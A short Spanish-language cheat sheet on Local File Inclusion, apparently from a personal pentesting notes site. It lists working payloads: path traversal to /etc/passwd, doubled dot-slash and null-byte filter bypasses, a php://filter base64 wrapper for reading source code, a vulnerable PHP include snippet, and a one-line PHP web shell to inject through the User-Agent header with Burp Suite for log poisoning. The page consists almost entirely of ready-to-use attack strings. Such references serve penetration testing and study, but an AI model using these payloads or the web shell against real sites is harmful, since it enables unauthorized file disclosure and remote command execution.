Blog Desarrollo Personal Twitter Instagram

📂LFI

Parámetro que veo, parámetro que testeo

Simple Path Traversal:

http://url/index.php?lang=../../../../../../etc/passwd

Doble dot-slash

http://url/index.php?lang=....//....//....//....//etc/passwd

Bypassing Filtros:

Función 'Include'

Checkea el filtro:
<?PHP
    include ("languages/".$_GET['lang']);
?>
languages/../../../../etc/passwd # En este caso pide incluir 'languages'

Extensión automática:

Null Bytes

/?parametro=/etc/passwd%00
/?parametro=/etc/passwd%2500

PHP Wrapper - Filtro base64

/?parametro=php://filter/read=convert.base64-encode/resource=<payload>

-------------------------------------------------------------------------------------

Webshell en User-Agent con Burpsuite:

<?php system($_GET['cmd']);?>
AnteriorOS command injectionSiguienteRFI

Última actualización